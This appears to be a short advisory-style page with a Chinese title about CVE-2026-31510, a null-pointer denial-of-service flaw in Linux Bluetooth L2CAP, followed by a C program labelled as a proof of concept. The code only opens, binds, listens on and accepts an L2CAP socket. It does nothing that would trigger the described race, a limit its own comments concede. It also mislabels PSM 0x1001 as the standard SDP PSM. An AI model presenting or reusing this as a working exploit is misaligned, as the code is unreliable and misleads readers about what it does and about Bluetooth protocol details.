CVE-2026-31510 Linux内核蓝牙L2CAP空指针拒绝服务漏洞

/* * PoC for CVE-2026-31510: Bluetooth L2CAP Null Pointer Dereference * This code attempts to trigger the race condition by creating a L2CAP socket * and manipulating connection states that may lead to l2cap_sock_ready_cb * being called with a null pointer. * Compile: gcc -o poc_cve_2026_31510 poc_cve_2026_31510.c -lbluetooth */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/l2cap.h> int main(int argc, char **argv) { int sock, client; struct sockaddr_l2 addr = {0}; struct sockaddr_l2 client_addr = {0}; socklen_t len; int opt = 1; // Create a L2CAP socket sock = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP); if (sock < 0) { perror("socket"); return 1; } // Set socket options to allow reusing address if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) { perror("setsockopt"); close(sock); return 1; } // Bind to local adapter and PSM addr.l2_family = AF_BLUETOOTH; addr.l2_bdaddr = *BDADDR_ANY; addr.l2_psm = htobs(0x1001); // Standard SDP PSM if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind"); close(sock); return 1; } // Listen if (listen(sock, 1) < 0) { perror("listen"); close(sock); return 1; } printf("[+] Listening on PSM 0x1001... Triggering vulnerability logic."); printf("[+] This attempt targets the l2cap_info_timeout path leading to null ptr deref."); // In a real scenario, specific timing or packet manipulation is required // to hit the exact race condition in l2cap_sock_ready_cb. // This setup mimics the environment where the bug occurs. len = sizeof(client_addr); client = accept(sock, (struct sockaddr *)&client_addr, &len); if (client >= 0) { printf("[+] Connection accepted."); close(client); } close(sock); return 0; }